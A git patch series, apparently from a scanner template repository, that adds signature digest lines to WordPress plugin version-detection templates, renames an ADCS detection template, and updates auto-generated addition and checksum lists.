+46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207bb0f8d6009d9a1a4d4401be25b52c6516893c33f39eb4d768dddd78f53bb8e9022100e79d0eec39ab6623bfb620a030c255d0d5c2fbe0accd554598d8b55e44fa1667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a90..a962d1376bb 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f5f7d6165b9ece57399498e3e3472d8613899288ad2e64adb0c83c62f3f2d001022022355530e7a2b6354975a1b0c663bd5156751c007eb003c9e6a00924bba27f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa297068720..809be488f59 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8f9e0a0fadd9ac46889390227292ba02ecbe597d53d18fa1f88397a608784e7022005c43050efe0b78888a2d413233700a7a5778b4cffc5fb374c905cfc28c4cffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7ed..da6f3d60162 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b9fb7ab29c61e5cb2354eac4b81bbabba383092edaa9cdf77591ece9ea79027502204d67328f8b4aff73025e236f96e9008d314eae61ffdf21d9aab00e6646b5ea0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f8..7a36d13dc83 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009f96691efd9ba09ddac8893710c814ad4a309d56834bf17824de0ac2560eecf02206d1377ca9adbb59c3bb7fbf89010383aaa11eec13e2ad361636f2b86ea63fea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2a..1cc92e36509 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d0239541ac0137c196fdc654a61bac659cc876ebf7e8181f78860e9220bfba5702203d5e832380d5113e52c1a530a79b87e14eba9d4629b1c1410dcf35210526d587:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8a..267453218f3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200775db4789159e050f4434b5047bb108e74c4bf0472b2a05506e5eb4a315f58c0220283f2ec5d3193e9d8eeceff0a996c9e1acd23cb80288e9388e0e160b8cc1c9da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5c..53d0e74b25b 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207b1ec5e917af72b70d1afc1574b82b8c2eba9df7968a3de5ca24c056d316504e02201bf9691f97eab6aa86a620978063e49946fd06567cabef4759e3224ec2bf42f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d97506..382137fe1bf 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035f673700620b877594f83a98cf06ab95cb43b5b096abe831d7f8888e5e32a14022045e6b16f6b28066683115ddfa624be6684e831b308736ad3d96c1b53de0cd28c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab22..09730ce402d 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220201e138c1ec5581e4e6cb5899349f56b89b33f34ebdfa1f4f9a3ca56e5351c2202204d8ade600699c59892843da9213440c03adf408dba81b663ddc2ce1594a0b2f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f8..2585b241add 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022031c2612d9d6f39f0396e0f87d1c39f54d1205fac1b40bed212e2ab67a56c60a6022014f60a00055a63539d24006e167fce59b8c7dbc13dc1d6419c8bd3f8945397fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a8..7b1fe387308 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059f4fdd0dab55b96f018d54d81596e4afde228dda1f0e85652b4dc4cf8ef2fbe022030ac9ed6d1ff46014141b58f3d585d951689598b5128372a5642b7b29fdf115b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d8..c6af7d4e38c 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d236eb5968ddb506715903d4b9446f7275497719638170309f240736403a84302210086ee6a588f9d5c50b8d861c63e68f53ef3ce0bc8d89daaa55667305c3de8c1ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8b..e9527fa0e9d 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e90dffa5327c6fe3c76a1183fc072a166e228776ae10fc6262114956bedf0b002203be51f76d27001c3745b6de40a137760c5d002555f2d06e61717db41ae74bf57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486a..f2d4ed95fb4 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a8df321ad63d2980483c02c1f226775f57df79850db23d117241f84f6d72d515022100f8b609bf335a06e509df815107fe83bc9f216c76e38285356a591f0cabde7abb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a69..39d352d9445 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022077553fc0f35cf4f36a1000de9f965b794d0d9b55c2d9be092eb057b91032b53a022100d681962a31b99d847851016e5f25eb96e484867f5cef6c9a1e49e07f42b6459c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc839..b81fa316da9 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c68aefd3801c9b9cd191c31d933bf9511643aa894807231324d345563139f9f102205e35a9b263bdf20d7dc5fa367f34548d440498b1018a30d7138da5400a52b87d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb8..e3b22679755 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205932a7a3f6c6f323187328623b108111b70fd2340e997443d130344658b343d90221008202278d6d42219dbc9d57e6adc1bb9d9451a7d3d780434e955f6a6ceca214a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53a..e756a579388 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206623540bbcbc63e5cb996efd004adfeeff127c75195aeb646141aeadd18a06ac02202f471bdd75f19d2a0bd04c3b8704211ac4355ce50b3daf9c78a1c9dcb6eecb7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f01359..0fed5799a93 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c4092f6cfc305aeb53730d9e9a25dd6df135d7f913ccf74c05eb7535398e92c002204bd652e5ac62fc0d3023a81093599add81d14f53c3a1c97b7711a8bfec3cfef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c7..fe9e5f1b26b 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df31fbe5717696c01866dc4917affce286609c907ba783b0ef2a2b96c745491102205cd240c73fcf7ef5a39f328f7f95bbc4eb92a19d2eead2cfa3eaeb888481a80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd7..5e4c0f3ca6a 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210096c85d6f9e277368ead68c2f0757d84091e2019197100eae001719cefd88cffb022100fac4ffbd52dbf02f155f717b4c78accf9b3b9fc0527e5a99282f13a767c89e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08d..a4ee11efefc 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220650f8cea974d8b2e352a666a3e80626ddf8e452448a0790de672285f7e4d0b91022100c6eda07092e96a1ac6286299950c6a388a2d2cdd85cad87fcc3ff79a97fecbb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e99..0b2b7f0231a 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100deb377984fd2b3ab9d27c28cb8a070d0ce275763fe901bb55b231a01fa3117c2022100a89391ba79403cb5d4083f2ef4d6618c038fdadedfdce568dc66f02b5ab77c41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf55667..92442865d4a 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f170af963b74277e46c3da5ba91fc83edcbf468c9498157c49e954f875662c720220618eab9f7680929c3b1ee51c1f8ad12517b64125c0436595dc728f34198c4f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac74..a08b7676295 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203934cca505b09c9bddbf78af4089aec5d025137a4d0d456eb7eb11563b12d257022100cd98223af3138e6b0a1bb9c8a4ca03dfd34c0863e1953f17bc63f855f1e5668a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df49..2f2812e9642 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100815241f8421040a127bbdb3259fce90cfd87c46eec6bc4763f27a7d3d6aa713e022100ea786efd10cfeb0d9ec1b7cfdb78f494046b58bbd9442415627899e23a103442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee0467..9120ceb7ecd 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202ba536d064a4552f875d397b0708b9843805e7ef2daa313c6d835b05a69a747b0221008b01bd691c4f3d2e317c37e5c689814ca3b2f1868b75b1f3f28ef18378864bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0d..be4ed155996 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c9cdd9a9270855ee166f1596b4b40f27800a6a9f4174216f83710fa4128e1bba022025c69b96e7007a78b3b6430d664ea921d55facc916f5e68a4ecd99c7fc966846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff55..841be88d9d3 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201d4ee1325ba19b866f722bc054eb6bfc7924d5fea84a3bcd2d1bdbbfdc561eff0220469c3933f131fdfcbe09378ebcaceea0e4601b4bc57c108098ca346e44b0470d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e3..f1d5acc0d90 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022039093043ab26441048b6b08994a650132e636b5a6a786c78fd796e631ae219a302210098cb0089292fdbdb87fbf3d01b73e194df76c4ffb98bdfe6a730437b6177caa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed6..5233960732e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220257fc3408cd037efa40f3965f70e07db7f4d2d80e7824a0905c6c69bc02f93a9022100813e17873e26f7b7100e2958036e149270d2722053cdcf229a8665522d91c35b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a172..820567bd848 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fdc176d18cfadc4ebdd03c96a2b2c896ba279b199c5fc5787ee65838289b5a8a02210081d9120859bb079fb9a5cde415bacf47eddc8a091b2a35efb5930726f2d29e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afebd..6599e51b5bc 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100887d497d3671535f30d43ff739fdd40c15acaedd878b27ee997bafee13c79811022100a3177032c93553fd1e11825ec7a9194e1610e9b51f0d2c1d2ac6d720a59f2c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b49..b0d3fd2d9aa 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df72f793ea66e6994fa7b7c697bd5bde4b8d628eacb5e3a1f5490e418ce76bb30221008eeaf54a1ab709e9880f169789858d5cfb0133ba46fca489decc5b0b7aa3ddc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda1174..db4ea9e87d9 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203aa42be8215e7ba48b01d278798d1dda57df3238e6f3fafa54a4177dd5f06be2022039c61d93d8c9822f02d7a73fed1d57f3e8e0dd30ba57ab558bafcb4ca46a13a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6c3391d67a1122f5087677207d30bcc2a4f24305 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 11:34:35 +0530 Subject: [PATCH 215/247] minor-update --- .../exposures/files/{adcs-detect.yaml => adcs-certificate.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/exposures/files/{adcs-detect.yaml => adcs-certificate.yaml} (97%) diff --git a/http/exposures/files/adcs-detect.yaml b/http/exposures/files/adcs-certificate.yaml similarity index 97% rename from http/exposures/files/adcs-detect.yaml rename to http/exposures/files/adcs-certificate.yaml index 6bf0001b6c3..b348b49268a 100644 --- a/http/exposures/files/adcs-detect.yaml +++ b/http/exposures/files/adcs-certificate.yaml @@ -1,4 +1,4 @@ -id: adcs-detect +id: adcs-certificate info: name: Certification Authority Web Enrollment (ADCS) - Detection From 211cbab5bb4a93092995059d5ff424f3e066620c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 11:35:25 +0530 Subject: [PATCH 216/247] minor-update --- http/exposures/files/adcs-certificate.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposures/files/adcs-certificate.yaml b/http/exposures/files/adcs-certificate.yaml index b348b49268a..537d3676f33 100644 --- a/http/exposures/files/adcs-certificate.yaml +++ b/http/exposures/files/adcs-certificate.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true shodan-query: html:"/certenroll" - tags: ad,adcs,exposure + tags: ad,adcs,exposure,files http: - method: GET From cc807e2209ff6af51b3f4d479fb22bcf397e06f5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 16 Jul 2024 08:36:18 +0000 Subject: [PATCH 217/247] Auto Generated New Template Addition List [Tue Jul 16 08:36:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 804bb748095..3ac6711252e 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml +http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/exposed-panels/falcosidekick-panel.yaml From 92c61a044a95ffbc563f301fbb22297e84841286 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 08:36:22 +0000 Subject: [PATCH 218/247] Auto Generated Templates Checksum [Tue Jul 16 08:36:22 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5d6543c9906..7bf58fe294b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3478,7 +3478,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36401.yaml:1092d9728d862b1d18a9ff74a145e414eb5e916e +http/cves/2024/CVE-2024-36401.yaml:ee5f88dccf1d4ffbb38cfea089a1a650527451ce http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36527.yaml:eb2651a0ee32128fdfe8ae24c72f5d61a1a7f68e http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 @@ -3491,6 +3491,7 @@ http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 +http/cves/2024/CVE-2024-4257.yaml:8876e33e746a9fd57af6a76fcac1c71ff3f00c4f http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 http/cves/2024/CVE-2024-4358.yaml:9c130ef94d82e026679e80b4fcd1d544991528e8 http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a @@ -7290,229 +7291,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:78e473b2002903a0192fd998b91f26e855b03d5e +http/technologies/wordpress/plugins/add-to-any.yaml:9829716605e935b6985f72c38c410dded0e990bc +http/technologies/wordpress/plugins/admin-menu-editor.yaml:33096ed0f498d97bdcad8672086d15d1fdf5aeff http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:771b39420e143f066b590d47b05bdd6dcbe9c8a9 +http/technologies/wordpress/plugins/akismet.yaml:3134245df155fa9481f374871f595185bd758264 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e 